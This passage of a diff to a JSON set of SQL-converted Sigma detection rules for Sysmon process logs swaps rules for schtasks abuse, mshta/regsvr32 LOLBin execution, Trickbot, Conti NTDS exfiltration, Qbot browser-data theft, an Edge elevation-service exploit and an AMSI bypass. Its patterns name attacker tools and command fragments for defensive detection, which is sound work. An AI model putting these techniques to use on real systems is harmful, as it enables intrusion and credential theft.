Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE 
'%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - 
"Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. 
UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": 
"9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + 
"attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1546.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "status": "experimental", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": 
"Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE 
'\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "title": "Potential CVE-2021-41379 
Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "status": "experimental", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 